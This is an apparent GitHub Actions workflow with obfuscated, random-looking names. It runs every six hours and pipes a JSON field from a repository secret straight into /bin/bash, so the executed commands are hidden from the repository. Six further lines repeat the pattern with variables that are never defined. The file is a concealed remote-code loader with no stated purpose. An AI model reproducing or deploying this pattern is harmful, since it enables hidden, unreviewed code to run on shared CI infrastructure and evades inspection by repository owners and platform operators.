name: nongyuanhui7654

on:
  workflow_dispatch:
  schedule:
    - cron: '2 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nongyuanhui7654
        env:
          gwqrg78744: ${{ secrets.gwqrg78744 }}
        run: |
          echo $gwqrg78744 | jq -r .dk5534 | /bin/bash
          echo $fq8966 | jq -r .ui246 | /bin/bash
          echo $hdr0902 | jq -r .ji02 | /bin/bash
          echo $sm7708 | jq -r .vbatn9 | /bin/bash
          echo $bhxvz04729 | jq -r .fer6691 | /bin/bash
          echo $nonh9 | jq -r .vzmc825 | /bin/bash
          echo $kzoyy792 | jq -r .fyah911 | /bin/bash

